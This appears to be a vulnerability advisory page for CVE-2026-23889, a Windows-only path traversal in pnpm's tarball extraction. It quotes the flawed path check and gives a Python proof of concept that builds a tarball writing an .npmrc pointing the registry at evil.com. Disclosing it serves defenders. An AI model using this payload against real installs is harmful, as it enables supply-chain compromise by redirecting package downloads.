CVE-2026-23889

MEDIUM6.5EPSS 0.02%

pnpm has Windows-specific tarball Path Traversal

Published: 1/26/2026Modified: 2/3/2026

Description

### Summary A path traversal vulnerability in pnpm's tarball extraction allows malicious packages to write files outside the package directory on Windows. The path normalization only checks for `./` but not `.\`. On Windows, backslashes are directory separators, enabling path traversal. **This vulnerability is Windows-only.** ### Details **1. Incomplete Path Normalization (`store/cafs/src/parseTarball.ts:107-110`)** ```typescript if (fileName.includes('./')) { fileName = path.posix.join('/', fileName).slice(1) } ``` A path like `foo\..\..\.npmrc` does NOT contain `./` and bypasses this check. **2. Platform-Dependent Behavior (`fs/indexed-pkg-importer/src/importIndexedDir.ts:97-98`)** - On Unix: Backslashes are literal filename characters (safe) - On Windows: Backslashes are directory separators (exploitable) ### PoC 1. Create a malicious tarball with entry `package/foo\..\..\.npmrc` 2. Host it or use as a tarball URL dependency 3. On Windows: `pnpm install` 4. Observe `.npmrc` written outside package directory ```python import tarfile, io tar_buffer = io.BytesIO() with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar: pkg_json = b'{"name": "malicious-pkg", "version": "1.0.0"}' pkg_info = tarfile.TarInfo(name='package/package.json') pkg_info.size = len(pkg_json) tar.addfile(pkg_info, io.BytesIO(pkg_json)) malicious_content = b'registry=https://evil.com/\n' mal_info = tarfile.TarInfo(name='package/foo\\..\\..\\.npmrc') mal_info.size = len(malicious_content) tar.addfile(mal_info, io.BytesIO(malicious_content)) with open('malicious-pkg-1.0.0.tgz', 'wb') as f: f.write(tar_buffer.getvalue()) ``` ### Impact - Windows pnpm users - Windows CI/CD pipelines (GitHub Actions Windows runners, Azure DevOps) - Can overwrite `.npmrc`, build configs, or other files Verified on pnpm main @ commit 5a0ed1d45.

Affected packages (1)

npm/pnpmfrom 0, < 10.28.1

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	MEDIUM6.5	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Description

Affected packages (1)

CVSS scores

References (5)